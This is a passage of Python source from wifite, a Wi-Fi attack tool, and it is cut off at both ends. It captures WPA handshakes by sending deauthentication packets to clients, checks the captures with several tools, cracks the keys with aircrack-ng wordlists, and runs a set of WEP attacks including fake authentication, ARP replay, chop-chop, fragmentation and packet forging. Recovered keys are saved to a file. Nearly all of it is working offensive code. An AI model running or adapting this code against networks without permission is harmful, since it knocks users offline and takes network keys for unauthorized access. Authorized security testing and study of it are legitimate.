return line.split(' ')[2]
elif line.endswith('Key (msg 2/4)') or line.endswith('Key (msg 4/4)'):
while line.startswith(' ') or line.startswith('\t'): line = line[1:]
line = line.replace('\t', ' ')
while line.find(' ') != -1: line = line.replace(' ', ' ')
return line.split(' ')[4]
return ''
def exit_gracefully(code=0):
"""
We may exit the program at any time.
We want to remove the temp folder and any files contained within it.
    Removes the temp files/folder and exits with error code "code".
"""
# Remove temp files and folder
if os.path.exists(temp):
for file in os.listdir(temp):
os.remove(temp + file)
os.rmdir(temp)
# Disable monitor mode if enabled by us
disable_monitor_mode()
# Change MAC address back if spoofed
mac_change_back()
    print GR+" [+]"+W+" quitting"  # wifite will now exit
print ''
# GTFO
exit(code)
def attack_interrupted_prompt():
"""
    Prompts user to decide whether to exit,
    skip to cracking WPA handshakes,
    or continue attacking the remaining targets (if applicable).
    Returns True if user chose to exit completely, False otherwise.
"""
global TARGETS_REMAINING
should_we_exit = False
# If there are more targets to attack, ask what to do next
if TARGETS_REMAINING > 0:
options = ''
print GR+"\n [+] %s%d%s target%s remain%s" % (G, TARGETS_REMAINING, W,
'' if TARGETS_REMAINING == 1 else 's',
's' if TARGETS_REMAINING == 1 else '')
print GR+" [+]"+W+" what do you want to do?"
options += G+'c'+W
print G+" [c]ontinue"+W+" attacking targets"
if len(WPA_CAPS_TO_CRACK) > 0:
options += W+', '+O+'s'+W
print O+" [s]kip"+W+" to cracking WPA cap files"
options += W+', or '+R+'e'+W
print R+" [e]xit"+W+" completely"
ri = ''
while ri != 'c' and ri != 's' and ri != 'e':
ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
if ri == 's':
TARGETS_REMAINING = -1 # Tells start() to ignore other targets, skip to cracking
elif ri == 'e':
should_we_exit = True
return should_we_exit
#################
# WPA FUNCTIONS #
#################
def wpa_get_handshake(iface, target, clients):
"""
Opens an airodump capture on the target, dumping to a file.
During the capture, sends deauthentication packets to the target both as
general deauthentication packets and specific packets aimed at connected clients.
Waits until a handshake is captured.
"iface" - interface to capture on
"target" - Target object containing info on access point
"clients" - List of Client objects associated with the target
Returns True if handshake was found, False otherwise
"""
global TARGETS_REMAINING, WPA_ATTACK_TIMEOUT
if WPA_ATTACK_TIMEOUT <= 0: WPA_ATTACK_TIMEOUT = -1
# Generate the filename to save the .cap file as <SSID>_aa-bb-cc-dd-ee-ff.cap
save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') + '.cap'
# Check if we already have a handshake for this SSID... If we do, generate a new filename
save_index = 0
while os.path.exists(save_as):
save_index += 1
save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') \
+ '_' + str(save_index) + '.cap'
# Remove previous airodump output files (if needed)
remove_airodump_files(temp + 'wpa')
# Start of large Try-Except; used for catching keyboard interrupt (Ctrl+C)
try:
# Start airodump-ng process to capture handshakes
cmd = ['airodump-ng',
'-w', temp + 'wpa',
'-c', target.channel,
'--bssid', target.bssid, iface]
proc_read = Popen(cmd, stdout=DN, stderr=DN)
# Setting deauthentication process here to avoid errors later on
proc_deauth = None
print ' %s starting %swpa handshake capture%s on "%s"' % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT)+W, G, W, G+target.ssid+W)
got_handshake = False
seconds_running = 0
target_clients = clients[:]
client_index = -1
# Deauth and check-for-handshake loop
while not got_handshake and (WPA_ATTACK_TIMEOUT <= 0 or seconds_running < WPA_ATTACK_TIMEOUT):
time.sleep(1)
seconds_running += 1
print " \r",
print ' %s listening for handshake...\r' % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W),
stdout.flush()
if seconds_running % WPA_DEAUTH_TIMEOUT == 0:
# Send deauth packets via aireplay-ng
cmd = ['aireplay-ng',
'-0', # Attack method (Deauthentication)
'1', # Number of packets to send
'-a', target.bssid]
client_index += 1
if client_index == -1 or len(target_clients) == 0 or client_index >= len(target_clients):
print " %s sending 1 deauth to %s*broadcast*%s..." % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W),
client_index = -1
else:
print " %s sending 1 deauth to %s... " % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, \
G+target_clients[client_index].bssid+W),
cmd.append('-h')
cmd.append(target_clients[client_index].bssid)
cmd.append(iface)
stdout.flush()
# Send deauth packets via aireplay, wait for them to complete.
proc_deauth = Popen(cmd, stdout=DN, stderr=DN)
proc_deauth.wait()
print "sent\r",
stdout.flush()
# Copy current dump file for consistency
if not os.path.exists(temp + 'wpa-01.cap'): continue
copy(temp + 'wpa-01.cap', temp + 'wpa-01.cap.temp')
# Save copy of cap file (for debugging)
#remove_file('/root/new/wpa-01.cap')
#copy(temp + 'wpa-01.cap', '/root/new/wpa-01.cap')
# Check for handshake
if has_handshake(target, temp + 'wpa-01.cap.temp'):
got_handshake = True
try: os.mkdir(WPA_HANDSHAKE_DIR + os.sep)
except OSError: pass
# Kill the airodump and aireplay processes
send_interrupt(proc_read)
send_interrupt(proc_deauth)
# Save a copy of the handshake
rename(temp + 'wpa-01.cap.temp', save_as)
print '\n %s %shandshake captured%s! saved as "%s"' % (GR+sec_to_hms(seconds_running)+W, G, W, G+save_as+W)
WPA_FINDINGS.append('%s (%s) handshake captured' % (target.ssid, target.bssid))
WPA_FINDINGS.append('saved as %s' % (save_as))
WPA_FINDINGS.append('')
# Strip handshake if needed
if WPA_STRIP_HANDSHAKE: strip_handshake(save_as)
# Add the filename and SSID to the list of 'to-crack'
# Cracking will be handled after all attacks are finished.
WPA_CAPS_TO_CRACK.append(CapFile(save_as, target.ssid, target.bssid))
break # Break out of while loop
# No handshake yet
os.remove(temp + 'wpa-01.cap.temp')
# Check the airodump output file for new clients
for client in parse_csv(temp + 'wpa-01.csv')[1]:
if client.station != target.bssid: continue
new_client = True
for c in target_clients:
if client.bssid == c.bssid:
new_client = False
break
if new_client:
print " %s %snew client%s found: %s " % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W, \
G+client.bssid+W)
target_clients.append(client)
# End of Handshake wait loop.
if not got_handshake:
print R+' [0:00:00]'+O+' unable to capture handshake in time'+W
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WPA handshake capture interrupted'+W
if attack_interrupted_prompt():
remove_airodump_files(temp + 'wpa')
send_interrupt(proc_read)
send_interrupt(proc_deauth)
print ''
exit_gracefully(0)
# clean up
remove_airodump_files(temp + 'wpa')
send_interrupt(proc_read)
send_interrupt(proc_deauth)
return got_handshake
def has_handshake_tshark(target, capfile):
"""
Uses TShark to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if program_exists('tshark'):
# Call Tshark to return list of EAPOL packets in cap file.
cmd = ['tshark',
'-r', capfile, # Input file
'-R', 'eapol', # Filter (only EAPOL packets)
'-n'] # Do not resolve names (MAC vendors)
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
lines = proc.communicate()[0].split('\n')
# Get list of all clients in cap file
clients = []
for line in lines:
if line.find('appears to have been cut short') != -1 or line.find('Running as user "root"') != -1 or line.strip() == '':
continue
while line.startswith(' '): line = line[1:]
while line.find(' ') != -1: line = line.replace(' ', ' ')
fields = line.split(' ')
src = fields[2].lower()
dst = fields[4].lower()
if src == target.bssid.lower() and clients.count(dst) == 0: clients.append(dst)
elif dst == target.bssid.lower() and clients.count(src) == 0: clients.append(src)
# Check each client for a handshake
for client in clients:
msg_num = 1 # Index of message in 4-way handshake (starts at 1)
for line in lines:
if line.find('appears to have been cut short') != -1: continue
if line.find('Running as user "root"') != -1: continue
if line.strip() == '': continue
# Sanitize tshark's output, separate into fields
while line[0] == ' ': line = line[1:]
while line.find(' ') != -1: line = line.replace(' ', ' ')
fields = line.split(' ')
# Sometimes tshark doesn't display the full header for "Key (msg 3/4)" on the 3rd handshake.
# This catches this glitch and fixes it.
if len(fields) < 8:
continue
elif len(fields) == 8:
fields.append('(msg')
fields.append('3/4)')
src = fields[2].lower() # Source MAC address
dst = fields[4].lower() # Destination MAC address
#msg = fields[9][0] # The message number (1, 2, 3, or 4)
msg = fields[-1][0]
# First, third msgs in 4-way handshake are from the target to client
if msg_num % 2 == 1 and (src != target.bssid.lower() or dst != client): continue
# Second, fourth msgs in 4-way handshake are from client to target
elif msg_num % 2 == 0 and (dst != target.bssid.lower() or src != client): continue
# The messages must appear in sequential order.
try:
if int(msg) != msg_num: continue
except ValueError: continue
msg_num += 1
# We need the first 4 messages of the 4-way handshake
# Although aircrack-ng cracks just fine with only 3 of the messages...
if msg_num >= 4:
return True
return False
def has_handshake_cowpatty(target, capfile, nonstrict=True):
"""
Uses cowpatty to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if not program_exists('cowpatty'): return False
# Call cowpatty to check if capfile contains a valid handshake.
cmd = ['cowpatty',
'-r', capfile, # input file
'-s', target.ssid, # SSID
'-c'] # Check for handshake
# Uses frames 1, 2, or 3 for key attack
if nonstrict: cmd.append('-2')
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
response = proc.communicate()[0]
if response.find('incomplete four-way handshake exchange') != -1:
return False
elif response.find('Unsupported or unrecognized pcap file.') != -1:
return False
elif response.find('Unable to open capture file: Success') != -1:
return False
return True
def has_handshake_pyrit(target, capfile):
"""
Uses pyrit to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if not program_exists('pyrit'): return False
# Call pyrit to "Analyze" the cap file's handshakes.
cmd = ['pyrit',
'-r', capfile,
'analyze']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
hit_essid = False
for line in proc.communicate()[0].split('\n'):
# Iterate over every line of output by Pyrit
if line == '' or line == None: continue
if line.find("AccessPoint") != -1:
hit_essid = (line.find("('" + target.ssid + "')") != -1) and \
(line.lower().find(target.bssid.lower()) != -1)
#hit_essid = (line.lower().find(target.bssid.lower()))
else:
# If Pyrit says it's good or workable, it's a valid handshake.
if hit_essid and (line.find(', good, ') != -1 or \
line.find(', workable, ') != -1):
# or line.find(', bad, ') != -1):
return True
return False
def has_handshake_aircrack(target, capfile):
"""
Uses aircrack-ng to check for handshake.
Returns True if found, False otherwise.
"""
if not program_exists('aircrack-ng'): return False
crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile
proc_crack = Popen(crack, stdout=PIPE, stderr=DN, shell=True)
proc_crack.wait()
txt = proc_crack.communicate()[0]
return (txt.find('Passphrase not in dictionary') != -1)
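# Note: the aircrack-ng check feeds an empty wordlist
# ('echo "" | aircrack-ng -a 2 -w - ...'); aircrack-ng only prints
# "Passphrase not in dictionary" once it has parsed a usable handshake, so
# that string doubles as a handshake-present indicator.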
def has_handshake(target, capfile):
"""
Checks if .cap file contains a handshake.
Returns True if handshake is found, False otherwise.
"""
valid_handshake = True
tried = False
if WPA_HANDSHAKE_TSHARK:
tried = True
valid_handshake = has_handshake_tshark(target, capfile)
    # Use CowPatty to check for handshake.
    if valid_handshake and WPA_HANDSHAKE_COWPATTY:
        tried = True
        valid_handshake = has_handshake_cowpatty(target, capfile)
# Check for handshake using Pyrit if applicable
if valid_handshake and WPA_HANDSHAKE_PYRIT:
tried = True
valid_handshake = has_handshake_pyrit(target, capfile)
# Check for handshake using aircrack-ng
if valid_handshake and WPA_HANDSHAKE_AIRCRACK:
tried = True
valid_handshake = has_handshake_aircrack(target, capfile)
if tried: return valid_handshake
print R+' [!]'+O+' unable to check for handshake: all handshake options are disabled!'
exit_gracefully(1)
def strip_handshake(capfile):
"""
Uses Tshark or Pyrit to strip all non-handshake packets from a .cap file
File in location 'capfile' is overwritten!
"""
output_file = capfile
if program_exists('pyrit'):
cmd = ['pyrit',
'-r', capfile,
'-o', output_file,
'strip']
call(cmd,stdout=DN, stderr=DN)
elif program_exists('tshark'):
# strip results with tshark
cmd = ['tshark',
'-r', capfile, # input file
'-R', 'eapol || wlan_mgt.tag.interpretation', # filter
'-w', capfile + '.temp'] # output file
proc_strip = call(cmd, stdout=DN, stderr=DN)
rename(capfile + '.temp', output_file)
else:
print R+" [!]"+O+" unable to strip .cap file: neither pyrit nor tshark were found"+W
def save_cracked(bssid, ssid, key, encryption):
"""
Saves cracked access point key and info to a file.
"""
sep = chr(0)
fout = open('cracked.txt', 'a')
fout.write(bssid + sep + ssid + sep + key + sep + encryption + '\n')
fout.flush()
fout.close()
def load_cracked():
"""
Loads info about cracked access points into list, returns list.
"""
result = []
if not os.path.exists('cracked.txt'): return result
fin = open('cracked.txt', 'r')
lines = fin.read().split('\n')
fin.close()
for line in lines:
fields = line.split(chr(0))
if len(fields) <= 3: continue
tar = Target(fields[0], '', '', '', fields[3], fields[1])
tar.key = fields[2]
result.append(tar)
return result
##########################
# WPA CRACKING FUNCTIONS #
##########################
def wpa_crack(capfile):
"""
Cracks cap file using aircrack-ng
This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat,
they can do so manually.
"""
if WPA_DICTIONARY == '':
print R+' [!]'+O+' no WPA dictionary found! use -dict <file> command-line argument'+W
return False
print GR+' [0:00:00]'+W+' cracking %s with %s' % (G+capfile.ssid+W, G+'aircrack-ng'+W)
start_time = time.time()
cracked = False
remove_file(temp + 'out.out')
remove_file(temp + 'wpakey.txt')
cmd = ['aircrack-ng',
'-a', '2', # WPA crack
'-w', WPA_DICTIONARY, # Wordlist
'-l', temp + 'wpakey.txt', # Save key to file
'-b', capfile.bssid, # BSSID of target
capfile.filename]
proc = Popen(cmd, stdout=open(temp + 'out.out', 'a'), stderr=DN)
try:
kt = 0 # Keys tested
kps = 0 # Keys per second
while True:
time.sleep(1)
if proc.poll() != None: # aircrack stopped
if os.path.exists(temp + 'wpakey.txt'):
# Cracked
inf = open(temp + 'wpakey.txt')
key = inf.read().strip()
inf.close()
WPA_FINDINGS.append('cracked wpa key for "%s" (%s): "%s"' % (G+capfile.ssid+W, G+capfile.bssid+W, C+key+W))
WPA_FINDINGS.append('')
save_cracked(capfile.bssid, capfile.ssid, key, 'WPA')
print GR+'\n [+]'+W+' cracked %s (%s)!' % (G+capfile.ssid+W, G+capfile.bssid+W)
print GR+' [+]'+W+' key: "%s"\n' % (C+key+W)
cracked = True
else:
# Did not crack
print R+'\n [!]'+R+'crack attempt failed'+O+': passphrase not in dictionary'+W
break
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
outf = open(temp + 'out.out', 'w')
outf.close()
for line in lines:
i = line.find(']')
j = line.find('keys tested', i)
if i != -1 and j != -1:
kts = line[i+2:j-1]
try: kt = int(kts)
except ValueError: pass
i = line.find('(')
j = line.find('k/s)', i)
if i != -1 and j != -1:
kpss = line[i+1:j-1]
try: kps = float(kpss)
except ValueError: pass
print "\r %s %s keys tested (%s%.2f keys/sec%s) " % \
(GR+sec_to_hms(time.time() - start_time)+W, G+add_commas(kt)+W, G, kps, W),
stdout.flush()
except KeyboardInterrupt: print R+'\n (^C)'+O+' WPA cracking interrupted'+W
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
return cracked
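# Note: wpa_crack() is a thin wrapper around a single aircrack-ng run,
# roughly equivalent to (illustrative file names):
#   aircrack-ng -a 2 -w wordlist.txt -l wpakey.txt -b <bssid> capture.cap
# with the "keys tested" and "k/s" figures scraped from the redirected output
# once per second to drive the progress line.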
def add_commas(n):
"""
Receives integer n, returns string representation of n with commas in thousands place.
I'm sure there's easier ways of doing this... but meh.
"""
strn = str(n)
lenn = len(strn)
i = 0
result = ''
while i < lenn:
if (lenn - i) % 3 == 0 and i != 0: result += ','
result += strn[i]
i += 1
return result
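# Note: on Python 2.7+ the loop above can be replaced by the built-in
# thousands separator, e.g.:
#   '{:,}'.format(1234567)  # -> '1,234,567'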
#################
# WEP FUNCTIONS #
#################
def attack_wep(iface, target, clients):
"""
Attacks WEP-encrypted network.
Returns True if key was successfully found, False otherwise.
"""
global WEP_TIMEOUT, TARGETS_REMAINING
if WEP_TIMEOUT <= 0: WEP_TIMEOUT = -1
total_attacks = 6 # 4 + (2 if len(clients) > 0 else 0)
if not WEP_ARP_REPLAY: total_attacks -= 1
if not WEP_CHOPCHOP: total_attacks -= 1
if not WEP_FRAGMENT: total_attacks -= 1
if not WEP_CAFFELATTE: total_attacks -= 1
if not WEP_P0841: total_attacks -= 1
if not WEP_HIRTE: total_attacks -= 1
if total_attacks <= 0:
print R+' [!]'+O+' unable to initiate WEP attacks: no attacks are selected!'
return False
remaining_attacks = total_attacks
print ' %s preparing attack "%s" (%s)' % \
(GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W, G+target.bssid+W)
interrupted_count = 0
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
# Start airodump process to capture packets
cmd_airodump = ['airodump-ng',
'-w', temp + 'wep', # Output file name (wep-01.cap, wep-01.csv)
'-c', target.channel, # Wireless channel
'--bssid', target.bssid,
iface]
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
proc_aireplay = None
proc_aircrack = None
successful = False # Flag for when attack is successful
started_cracking = False # Flag for when we have started aircrack-ng
client_mac = '' # The client mac we will send packets to/from
total_ivs = 0
ivs = 0
last_ivs = 0
for attack_num in xrange(0, 6):
# Skip disabled attacks
if attack_num == 0 and not WEP_ARP_REPLAY: continue
elif attack_num == 1 and not WEP_CHOPCHOP: continue
elif attack_num == 2 and not WEP_FRAGMENT: continue
elif attack_num == 3 and not WEP_CAFFELATTE: continue
elif attack_num == 4 and not WEP_P0841: continue
elif attack_num == 5 and not WEP_HIRTE: continue
remaining_attacks -= 1
try:
if wep_fake_auth(iface, target, sec_to_hms(WEP_TIMEOUT)):
# Successful fake auth
client_mac = THIS_MAC
elif not WEP_IGNORE_FAKEAUTH:
send_interrupt(proc_aireplay)
send_interrupt(proc_airodump)
print R+' [!]'+O+' unable to fake-authenticate with target'
print R+' [!]'+O+' to skip this speed bump, select "ignore-fake-auth" at command-line'
return False
remove_file(temp + 'arp.cap')
# Generate the aireplay-ng arguments based on attack_num and other params
cmd = get_aireplay_command(iface, attack_num, target, clients, client_mac)
if cmd == '': continue
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s attacking "%s" via' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W),
if attack_num == 0: print G+'arp-replay',
elif attack_num == 1: print G+'chop-chop',
elif attack_num == 2: print G+'fragmentation',
elif attack_num == 3: print G+'caffe-latte',
elif attack_num == 4: print G+'p0841',
elif attack_num == 5: print G+'hirte',
print 'attack'+W
print ' %s captured %s%d%s ivs @ %s iv/sec' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G, total_ivs, W, G+'0'+W),
stdout.flush()
time.sleep(1)
if attack_num == 1:
# Send a deauth packet to broadcast and all clients *just because!*
wep_send_deauths(iface, target, clients)
last_deauth = time.time()
replaying = False
time_started = time.time()
while time.time() - time_started < WEP_TIMEOUT:
# time.sleep(5)
for time_count in xrange(0, 6):
if WEP_TIMEOUT == -1:
current_hms = "[endless]"
else:
current_hms = sec_to_hms(WEP_TIMEOUT - (time.time() - time_started))
print "\r %s\r" % (GR+current_hms+W),
stdout.flush()
time.sleep(1)
# Calculates total seconds remaining
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print "\r ",
print "\r %s captured %s%d%s ivs @ %s%d%s iv/sec" % \
(GR+current_hms+W, G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
if ivs - last_ivs == 0 and time.time() - last_deauth > 30:
print "\r %s deauthing to generate packets..." % (GR+current_hms+W),
wep_send_deauths(iface, target, clients)
print "done\r",
last_deauth = time.time()
last_ivs = ivs
stdout.flush()
if total_ivs + ivs >= WEP_CRACK_AT_IVS and not started_cracking:
# Start cracking
cmd = ['aircrack-ng',
'-a', '1',
'-l', temp + 'wepkey.txt']
#temp + 'wep-01.cap']
# Append all .cap files in temp directory (in case we are resuming)
for file in os.listdir(temp):
if file.startswith('wep-') and file.endswith('.cap'):
cmd.append(temp + file)
print "\r %s started %s (%sover %d ivs%s)" % (GR+current_hms+W, G+'cracking'+W, G, WEP_CRACK_AT_IVS, W)
proc_aircrack = Popen(cmd, stdout=DN, stderr=DN)
started_cracking = True
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print '\n\n %s %s %s (%s)! key: "%s"' % (current_hms, G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
                    try: os.kill(proc_aireplay.pid, SIGTERM)
except: pass
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
time.sleep(0.5)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Check if aireplay is still executing
if proc_aireplay.poll() == None:
if replaying: print ', '+G+'replaying \r'+W,
elif attack_num == 1 or attack_num == 2: print ', waiting for packet \r',
stdout.flush()
continue
# At this point, aireplay has stopped
if attack_num != 1 and attack_num != 2:
print '\r %s attack failed: %saireplay-ng exited unexpectedly%s' % (R+current_hms, O, W)
break # Break out of attack's While loop
# Check for a .XOR file (we expect one when doing chopchop/fragmentation
xor_file = ''
for filename in sorted(os.listdir(temp)):
if filename.lower().endswith('.xor'): xor_file = temp + filename
if xor_file == '':
print '\r %s attack failed: %sunable to generate keystream %s' % (R+current_hms, O, W)
break
remove_file(temp + 'arp.cap')
cmd = ['packetforge-ng',
'-0',
                   '-a', target.bssid,
'-h', client_mac,
'-k', '192.168.1.2',
'-l', '192.168.1.100',
'-y', xor_file,
'-w', temp + 'arp.cap',
iface]
proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN)
proc_pforge.wait()
forged_packet = proc_pforge.communicate()[0]
remove_file(xor_file)
            if forged_packet == None: forged_packet = ''
            forged_packet = forged_packet.strip()
            if forged_packet.find('Wrote packet') == -1:
                print "\r %s attack failed: unable to forge ARP packet %s" % (R+current_hms+O, W)
break
# We were able to forge a packet, so let's replay it via aireplay-ng
cmd = ['aireplay-ng',
'--arpreplay',
'-b', target.bssid,
'-r', temp + 'arp.cap', # Used the forged ARP packet
'-F', # Select the first packet
iface]
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s forged %s! %s... ' % (GR+current_hms+W, G+'arp packet'+W, G+'replaying'+W)
replaying = True
# After the attacks, if we are already cracking, wait for the key to be found!
while started_cracking: # ivs > WEP_CRACK_AT_IVS:
time.sleep(5)
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print GR+" [endless]"+W+" captured %s%d%s ivs, iv/sec: %s%d%s \r" % \
(G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
last_ivs = ivs
stdout.flush()
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print GR+'\n\n [endless] %s %s (%s)! key: "%s"' % (G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Keyboard interrupt during attack
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WEP attack interrupted\n'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
if proc_aircrack != None:
send_interrupt(proc_aircrack)
options = []
selections = []
if remaining_attacks > 0:
options.append('%scontinue%s attacking this target (%d remaining WEP attack%s)' % \
(G, W, (remaining_attacks), 's' if remaining_attacks != 1 else ''))
selections.append(G+'c'+W)
if TARGETS_REMAINING > 0:
options.append('%sskip%s this target, move onto next target (%d remaining target%s)' % \
(O, W, TARGETS_REMAINING, 's' if TARGETS_REMAINING != 1 else ''))
selections.append(O+'s'+W)
options.append('%sexit%s the program completely' % (R, W))
selections.append(R+'e'+W)
if len(options) > 1:
# Ask user what they want to do, Store answer in "response"
print GR+' [+]'+W+' what do you want to do?'
response = ''
while response != 'c' and response != 's' and response != 'e':
for option in options:
print ' %s' % option
response = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % (', '.join(selections))).lower()[0]
else:
response = 'e'
if response == 'e' or response == 's':
# Exit or skip target (either way, stop this attack)
if WEP_SAVE:
# Save packets
                    save_as = re.sub(r'[^a-zA-Z0-9]', '', target.ssid) + '_' + target.bssid.replace(':', '-') + '.cap'
try: rename(temp + 'wep-01.cap', save_as)
except OSError: print R+' [!]'+O+' unable to save capture file!'+W
else: print GR+' [+]'+W+' packet capture '+G+'saved'+W+' to '+G+save_as+W
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
print ''
if response == 'e':
exit_gracefully(0)
return
elif response == 'c':
# Continue attacks
# Need to backup temp/wep-01.cap and remove airodump files
i = 2
while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
i += 1
copy(temp + "wep-01.cap", temp + 'wep-' + str(i) + '.cap')
remove_airodump_files(temp + 'wep')
# Need to restart airodump-ng, as it's been interrupted/killed
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
# Say we haven't started cracking yet, so we re-start if needed.
started_cracking = False
# Reset IVs counters for proper behavior
total_ivs += ivs
ivs = 0
last_ivs = 0
# Also need to remember to crack "temp/*.cap" instead of just wep-01.cap
pass
if successful:
print GR+'\n [0:00:00]'+W+' attack complete: '+G+'success!'+W
else:
print GR+'\n [0:00:00]'+W+' attack complete: '+R+'failure'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
def wep_fake_auth(iface, target, time_to_display):
"""
Attempt to (falsely) authenticate with a WEP access point.
    Allows 3 seconds for each of the 5 authentication attempts.
Returns True if authentication was successful, False otherwise.
"""
max_wait = 3 # Time, in seconds, to allow each fake authentication
max_attempts = 5 # Number of attempts to make
for fa_index in xrange(1, max_attempts + 1):
print '\r ',
print '\r %s attempting %sfake authentication%s (%d/%d)... ' % \
(GR+time_to_display+W, G, W, fa_index, max_attempts),
stdout.flush()
cmd = ['aireplay-ng',
'-1', '0', # Fake auth, no delay
'-a', target.bssid,
'-T', '1'] # Make 1 attempt
if target.ssid != '':
cmd.append('-e')
cmd.append(target.ssid)
cmd.append(iface)
proc_fakeauth = Popen(cmd, stdout=PIPE, stderr=DN)
started = time.time()
while proc_fakeauth.poll() == None and time.time() - started <= max_wait: pass
if time.time() - started > max_wait:
send_interrupt(proc_fakeauth)
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
result = proc_fakeauth.communicate()[0].lower()
        if result.find('switching to shared key') != -1 or \
           result.find('rejects open system') != -1: pass
# TODO Shared Key Authentication (SKA)
if result.find('association successful') != -1:
print G+'success!'+W
return True
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
print ''
return False
def get_aireplay_command(iface, attack_num, target, clients, client_mac):
"""
Returns aireplay-ng command line arguments based on parameters.
"""
cmd = ''
if attack_num == 0:
cmd = ['aireplay-ng',
'--arpreplay',
'-b', target.bssid,
'-x', str(WEP_PPS)] # Packets per second
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 1:
cmd = ['aireplay-ng',
'--chopchop',
'-b', target.bssid,
'-x', str(WEP_PPS), # Packets per second
'-m', '60', # Minimum packet length (bytes)
               '-n', '82', # Maximum packet length
'-F'] # Automatically choose the first packet
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 2:
cmd = ['aireplay-ng',
'--fragment',
'-b', target.bssid,
'-x', str(WEP_PPS), # Packets per second
'-m', '100', # Minimum packet length (bytes)
'-F'] # Automatically choose the first packet
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 3:
cmd = ['aireplay-ng',
'--caffe-latte',
'-b', target.bssid]
if len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 4:
cmd = ['aireplay-ng',
'--interactive',
'-b', target.bssid,
'-c', 'ff:ff:ff:ff:ff:ff',
'-t', '1', # Only select packets with ToDS bit set
'-x', str(WEP_PPS), # Packets per second
'-F', # Automatically choose the first packet
'-p', '0841']
cmd.append(iface)
elif attack_num == 5:
if len(clients) == 0:
print R+' [0:00:00] unable to carry out hirte attack: '+O+'no clients'
return ''
cmd = ['aireplay-ng',
'--cfrag',
